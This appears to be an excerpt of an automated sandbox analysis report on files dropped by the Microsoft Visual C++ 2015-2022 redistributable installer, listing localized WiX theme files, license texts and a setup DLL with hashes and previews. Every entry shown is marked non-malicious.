                                                                        SHA-512:063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive | /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\thm.xml

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8332
                                                                        Entropy (8bit):5.184632608060528
                                                                        Encrypted:false
                                                                        SSDEEP:96:8L2HdQG+3VzHfz96zYFGaPSWXdhRAmImlqFQKFBiUxn7Ke5A82rkO/pWk3nswP:ZHAzZ/3
                                                                        MD5:F62729C6D2540015E072514226C121C7
                                                                        SHA1:C1E189D693F41AC2EAFCC363F7890FC0FEA6979C
                                                                        SHA-256:F13BAE0EC08C91B4A315BB2D86EE48FADE597E7A5440DCE6F751F98A3A4D6916
                                                                        SHA-512:CBBFBFA7E013A2B85B78D71D32FDF65323534816978E7544CA6CEA5286A0F6E8E7E5FFC4C538200211F11B94373D5658732D5D8AA1D01F9CCFDBF20F154F1471
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (c) .NET Foundation and contributors. All rights reserved. Licensed under the Microsoft Reciprocal License. See LICENSE.TXT file in the project root for full license information. -->......<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Heig

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\wixstdba.dll

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):195600
                                                                        Entropy (8bit):6.682530937585544
                                                                        Encrypted:false
                                                                        SSDEEP:3072:OXoiFK6b0k77I+QfaIl191rSJHvlalB+8BHkY6v53EfcUzN0m6I+WxBlnKzeZuqt:OXoQNb++gDrSJdr8BHkPh3wIgnK/IU1a
                                                                        MD5:EAB9CAF4277829ABDF6223EC1EFA0EDD
                                                                        SHA1:74862ECF349A9BEDD32699F2A7A4E00B4727543D
                                                                        SHA-256:A4EFBDB2CE55788FFE92A244CB775EFD475526EF5B61AD78DE2BCDFADDAC7041
                                                                        SHA-512:45B15ADE68E0A90EA7300AEB6DCA9BC9E347A63DBA5CE72A635957564D1BDF0B1584A5E34191916498850FC7B3B7ECFBCBFCB246B39DBF59D47F66BC825C6FD2
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..R...R...R..h.N..R..h.L.R..h.M..R.......R.......R.......R...*<..R...*,..R...R...S..K....R..K....R..N.@..R...R(..R..K....R..Rich.R..................PE..L......Z...........!................d.....................................................@..............................................................D......,.......T...............................@...............X............................text............................... ..`.rdata.............................@..@.data...............................@....gfids..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1028\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):18415
                                                                        Entropy (8bit):4.043868285184243
                                                                        Encrypted:false
                                                                        SSDEEP:192:Haz4aHQbC6dBCLCNavmu6OqSPEmmVUJ9etKL5W2cBxGC4iSM0fvJ9seyryH1mqGI:2yk/RF8e7GWU2
                                                                        MD5:2B063D92663595DFE4781AE687A03D86
                                                                        SHA1:0FB582E756DBC751EA380593AC4DA27DDB4EBB06
                                                                        SHA-256:44C76290F7A2E45940E8338912FEB49BCF4E071CFA85D2D34762857743ACBC8D
                                                                        SHA-512:94C8FDA6173C7F5740F206190EDCD1F1F1C309596B710D400E23CD363A619D707A5D4576D4FE63AB7CB68947F009EFD29A1FBE04743A294698BF2AE17E92C214
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'dc\'9b\'f3\'77\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2015 - 2022 \f1\'88\'cc\'d0\'d0\'eb\'41\'b6\'ce\f0 \par..\b0\f1\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'ca\'c7\'d9\'46\'d3\'c3\'91\'f4\'c5\'63\f0 Microsoft Corporation (\f1\'bb\'f2\'c6\'e4\'ea\'50\'82\'53\'c6\'f3\'98\'49\'a3\'ac\'d2\'95\'d9\'46\'d3\'c3\'91\'f4\'cb\'f9\'be\'d3\'d7\'a1\'b5\'c4\'b5\'d8\'fc\'63\'b6\'f8\'b6\'a8\f0 ) \f1\'d6\'ae\'e9\'67\'b3\'c9\'c1\'a2\'b5\'c4\'ba\'cf\'bc\'73\'a1\'a3\'cb\'fc\'82\'83\'df\'6d\'d3\'c3\'ec\'b6\'c9\'cf\'ca\'f6\'dc\'9b\'f3\'77\'a1\'a3\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'d2\'e0\'df\'6d\'d3\'c3\'ec\'b6\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'84\'d5\

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1028\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2980
                                                                        Entropy (8bit):6.163758160900388
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtMes9T/JhDXsA9EHSniarRFeOrw8N3mZNNTN2N08CEjMUWFPmDlTKJKy2:uDiTlFrDDsA9tfHP8+8nhM0WamzqDFqD
                                                                        MD5:472ABBEDCBAD24DBA5B5F5E8D02C340F
                                                                        SHA1:974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
                                                                        SHA-256:8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
                                                                        SHA-512:676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ................. ......................../passive | /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1029\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13234
                                                                        Entropy (8bit):5.125368352290407
                                                                        Encrypted:false
                                                                        SSDEEP:192:T7wfl7OGpX5a5HEgQ2psch5jotXxEvH++3kamdyjCrDZugDHgbGNl86NhrYGY9D2:Yfl7O5ocINaHmjI44fUixAvOwwrJ2
                                                                        MD5:E7DC9CA9474A13FA4529D91BCD2AB8CC
                                                                        SHA1:511F5DE8A99C09EC3766C5E2494A79EACCA261C8
                                                                        SHA-256:503C433DCDE2F3A9E7D388A5FF2B0612E7D8F90F5188D5B2B60228DB33044FDE
                                                                        SHA-512:77108E53CD58E42F847D8EF23A07723C4849DC41DBE1C3EF939B9170E75F525BEC9D210D6C1FBFEB330ECE2E77B8A8E2808730D9E6F72F5B3FE626D58B6068C6
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 LICEN\f1\'c8N\f0\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\f1\'c8NOSTI MICROSOFT\par..\f0 MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Tyto licen\f1\'e8n\f0\'ed podm\'ednky p\f1\'f8edstavuj\f0\'ed smlouvu mezi spole\f1\'e8nost\f0\'ed Microsoft Corporation (nebo n\f1\'eckterou z jej\f0\'edch afilac\'ed, v\~z\'e1vislosti na tom, kde bydl\'edte) a v\'e1mi. Vztahuj\'ed se na v\'fd\f1\'9ae uveden\f0\'fd software. Podm\'ednky se rovn\f1\'ec\'9e vztahuj\f0\'ed na jak\'e9koli slu\f1\'9eby Microsoft nebo aktualizace pro software, pokud se na slu\'9eby nebo aktualizace nevztahuj\f0\'ed odli\f1\'9an\f0\'e9 podm\'ednky.\par..\b DODR\f1\'8e\f0\'cdTE-LI

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1029\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3333
                                                                        Entropy (8bit):5.370651462060085
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtesM6H2hDdxHOjZxsaIIy3Iy5sDMN3mkNFN7NwcfiPc3hKPnWZLF0hKqZ:uDiTlVxxHOy/9xXfpZJYnL8xK2S
                                                                        MD5:16343005D29EC431891B02F048C7F581
                                                                        SHA1:85A14C40C482D9351271F6119D272D19407C3CE9
                                                                        SHA-256:07FB3EC174F25DFBE532D9D739234D9DFDA8E9D34F01FE660C5B4D56989FA779
                                                                        SHA-512:FF1AE9C21DCFB018DD4EC82A6D43362CB8C591E21F45DD1C25955D83D328B57C8D454BBE33FBC73A70DADF1DFB3AE27502C9B3A8A3FF2DA97085CA0D9A68AB03
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instala.n. program [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Opravdu chcete akci zru.it?</String>.. <String Id="HelpHeader">N.pov.da nastaven.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [adres..] . Nainstaluje, oprav., odinstaluje nebo.. vytvo.. .plnou m.stn. kopii svazku v adres..i. V.choz. mo.nost. je instalace...../passive | /quiet . Zobraz. minim.ln. u.ivatelsk. rozhran. bez v.zev nebo nezobraz. ..dn. u.ivatelsk. rozhran. a.. ..dn. v.zvy. V.choz. mo.nost. je zobrazen. u.ivatelsk.ho rozhran. a v.ech v.zev...../noresta

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1031\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):12392
                                                                        Entropy (8bit):5.192979871787938
                                                                        Encrypted:false
                                                                        SSDEEP:192:N6AY7JCc/2WVJtntrUqMmvuUh+mxYpnY4+ZqDe6mUZaEzYNvQ8yOejISRC4WL32:PUw2lSSssWVzOHyOejIS/22
                                                                        MD5:2DDCA2866D76C850F68ACDFDB696D6DE
                                                                        SHA1:C5076F10B0F0654CDE2C990DEEB2772F3CC4844B
                                                                        SHA-256:28F63BAD9C2960395106011761993049546607F8A850D344D6A54042176BF03F
                                                                        SHA-512:E3A3693B92873E0B42007616FF6916304EDC5C4F2EEE3E9276F87E86DD94C2BF6E1CF4E895CDF9A1AA0CAC0B381B8840EEE1F491123E901DEE75638B8BC5CE1B
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil Tahoma;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT-SOFTWARE-LIZENZBEDINGUNGEN\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Diese Lizenzbestimmungen stellen eine Vereinbarung zwischen Ihnen und der Microsoft Corporation (bzw. abh\'e4ngig von Ihrem Wohnsitz einem ihrer Affiliate-Partner) dar. Sie gelten f\'fcr die oben angef\'fchrte Software. Die Bestimmungen gelten ebenso f\'fcr jegliche von Microsoft angebotenen Dienste oder Updates f\'fcr die Software, sofern diesen keine anderen Bestimmungen beiliegen.\par..\b WENN SIE DIESE LIZENZBESTIMMUNGEN EINHALTEN, VERF\'dcGEN SIE \'dcBER DIE NACHFOLGEND AUFGEF\'dcHRTEN RECHTE.\par....\pard{\pntext\f3\'B7\tab}{\*\pn\pnlvlblt\pnf3\pnindent360{\pntxtb\'B7}}\

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1031\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3379
                                                                        Entropy (8bit):5.094097800535488
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOZuesXJhDEVTORNxSMoZN3mteNSiNGNsZuiAXEqicMwhPXbhu9KwKlK8Kq:uDiTl3N7xSbu0N8+AhSNnm
                                                                        MD5:561F3F32DB2453647D1992D4D932E872
                                                                        SHA1:109548642FB7C5CC0159BEDDBCF7752B12B264C0
                                                                        SHA-256:8E0DCA6E085744BFCBFF46F7DCBCFA6FBD722DFA52013EE8CEEAF682D7509581
                                                                        SHA-512:CEF8C80BEF8F88208E0751305DF519C3D2F1C84351A71098DC73392EC06CB61A4ACA35182A0822CF6934E8EE42196E2BCFE810CC859965A9F6F393858A1242DF
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] - Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">M.chten Sie den Vorgang wirklich abbrechen?</String>.. <String Id="HelpHeader">Setup-Hilfe</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [Verzeichnis] - installiert, repariert, deinstalliert oder.. erstellt eine vollst.ndige lokale Kopie des Bundles im Verzeichnis. Installieren ist die Standardeinstellung...../passive | /quiet - zeigt eine minimale Benutzeroberfl.che ohne Eingabeaufforderungen oder keine.. Benutzeroberfl.che und keine Eingabeaufforderungen an. Standardm..ig werden die Benutzeroberfl.che und alle Eingab

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1036\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):12349
                                                                        Entropy (8bit):5.108676965693909
                                                                        Encrypted:false
                                                                        SSDEEP:384:7Jja9NaNbUmVao9L5EOMjWghxjUSeuDSej2:dj84gmVz9EDjW8GSZC
                                                                        MD5:A6E352E5804313CCDE3E4D5DDDDE122D
                                                                        SHA1:834E3AAA07DC675589A9E5FCD23CE5586C2739E8
                                                                        SHA-256:5C13A65870D770D1642A4259EECB436257CA39016A0500F747BE9C79BE0C7009
                                                                        SHA-512:6578AC6467F61930BC1B20E404441725C63790C65AEC1ACE297429EAD15F50E68D5FE9CC1451AC86AE23DC1A7FE967650166293010D687785FB81FB4492B87C4
                                                                        Malicious:false
                                                                        Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil\fcharset177 Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\ltrpar\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMES DU CONTRAT DE LICENCE LOGICIEL MICROSOFT\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Les pr\'e9sentes conditions de licence constituent un contrat entre Microsoft Corporation (ou en fonction de votre lieu de r\'e9sidence, l\f1\rquote\f0 un de ses affili\'e9s) et vous. Ils s\f1\rquote\f0 appliquent au logiciel vis\'e9 ci-dessus. Les termes s\f1\rquote\f0 appliquent \'e9galement \'e0 tout service et \'e0 toute mise \'e0 jour Microsoft pour ce logiciel, \'e0 moins que d\f1\rquote\f0 autres termes n\f1\rquote\f0 accompagnent ces \'e9l\'e9ments.\par..\b SI VOUS VOUS CONFORMEZ AUX PR\'c9SENTS TERMES DU CONTRAT D

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1036\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3366
                                                                        Entropy (8bit):5.0912204406356905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1BesgKLhD1K8cocDSN3m4NlN2ZfNmXL8ePZFcZkLPqUf9fQKRLKeKqZfj:uDiTlABzH1/qt4qgcXY
                                                                        MD5:7B46AE8698459830A0F9116BC27DE7DF
                                                                        SHA1:D9BB14D483B88996A591392AE03E245CAE19C6C3
                                                                        SHA-256:704DDF2E60C1F292BE95C7C79EE48FE8BA8534CEB7CCF9A9EA68B1AD788AE9D4
                                                                        SHA-512:FC536DFADBCD81B42F611AC996059A6264E36ECF72A4AEE7D1E37B87AEFED290CC5251C09B68ED0C8719F655B163AD0782ACD8CE6332ED4AB4046C12D8E6DBF6
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installation de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Voulez-vous vraiment annuler.?</String>.. <String Id="HelpHeader">Aide du programme d'installation</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installe, r.pare, d.sinstalle ou.. cr.e une copie locale compl.te du groupe dans le r.pertoire. Install est l'option par d.faut...../passive | /quiet - affiche une interface minimale, sans invite, ou n'affiche ni interface.. ni invite. Par d.faut, l'interface et toutes les invites sont affich.es...../norestart - supprime toutes les tentatives de red.

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1040\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11440
                                                                        Entropy (8bit):5.037988271709582
                                                                        Encrypted:false
                                                                        SSDEEP:192:HJdZDQX6UXR2+5AkgS/PhdzerS8QGowHV66zdgkycjGCDLQ+n3YJ258FSiej4LaW:7azAUd+RrR5jjPLQY3YJTSjk42
                                                                        MD5:BC58AD6ABB16B982AEBADC121B37E706
                                                                        SHA1:25E3E4127A643DB5DB2A0B62B02DE871359FAE42
                                                                        SHA-256:70ECF23C03B66A2B18E173332586AFA8F00F91E02A80628F4F9CB2521E27F6AC
                                                                        SHA-512:8340452CB5E196CB1D5DA6DBB3FA8872E519D7903A05331055370B4850D912674F0B6AF3D6E4F94248FE8135EB378EB36969821D711FE1624A04AF13BBE55D70
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 CONDIZIONI DI LICENZA SOFTWARE MICROSOFT\par..RUNTIME MICROSOFT VISUAL C++ 2015 - 2022 \par..\b0 Le presenti condizioni di licenza costituiscono il contratto tra Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) e il licenziatario. Tali condizioni si applicano al software Microsoft di cui sopra. Le condizioni si applicano inoltre a qualsiasi servizio o aggiornamento di Microsoft relativo al software, tranne se accompagnato da condizioni differenti.\par..\b QUALORA IL LICENZIATARIO SI ATTENGA ALLE PRESENTI CONDIZIONI DI LICENZA, DISPORR\'c0 DEI DIRITTI INDICATI DI SEGUITO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1040\thm.wxl

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3319
                                                                        Entropy (8bit):5.019774955491369
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1eesy+hD9BOtBFv5Vo8BbQhMNDJN3msNlNohNNz+wcPclM+PAoYKp+K/u:uDiTlfQvo8WutJ/s9FHNOJp
                                                                        MD5:D90BC60FA15299925986A52861B8E5D5
                                                                        SHA1:FADFCA9AB91B1AB4BD7F76132F712357BD6DB760
                                                                        SHA-256:0C57F40CC2091554307AA8A7C35DD38E4596E9513E9EFAE00AC30498EF4E9BC2
                                                                        SHA-512:11764D0E9F286B5AA7B1A9601170833E462A93A1E569A032FCBA9879174305582BD42794D4131B83FBCFBF1CF868A8D5382B11A4BD21F0F7D9B2E87E3C708C3F
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installazione di [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Annullare?</String>.. <String Id="HelpHeader">Guida alla configurazione</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installa, ripara, disinstalla o.. crea una copia locale completa del bundle nella directory. L'opzione predefinita . Install...../passive | /quiet - visualizza un'interfaccia utente minima senza prompt oppure non visualizza alcuna interfaccia utente.. n. prompt. Per impostazione predefinita viene visualizzata l'intera interfaccia utente e tutti i prompt...../norestart - annulla quals

                                                                        C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1041\license.rtf

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):30228
                                                                        Entropy (8bit):3.785116198512527
                                                                        Encrypted:false
                                                                        SSDEEP:192:I6ZzmL3hCm2AivEiTsk3H1DjM3Lm4nVsO4Uy9C0QueLJkEBN7VvfNSqkO+0TU7B9:VArCQx/2LLW7//72
                                                                        MD5:47C315C54B6F2078875119FA7A718499
                                                                        SHA1:F650DDB5DF2AF2EE7555C410D034B37B9DFD055B
                                                                        SHA-256:C3061A334BFD5F02B7085F8F454D5D3D97D477AF14BAB497BF31A7887BC90C5B
                                                                        SHA-512:A0E4B0FCCCFDD93BAF133C2080403E8719E4A6984237F751BD883C0D3C52D818EFD00F8BA7726A2F645F66286305599403470F14D39EEDC526DDE59228A5F261
                                                                        Malicious:false
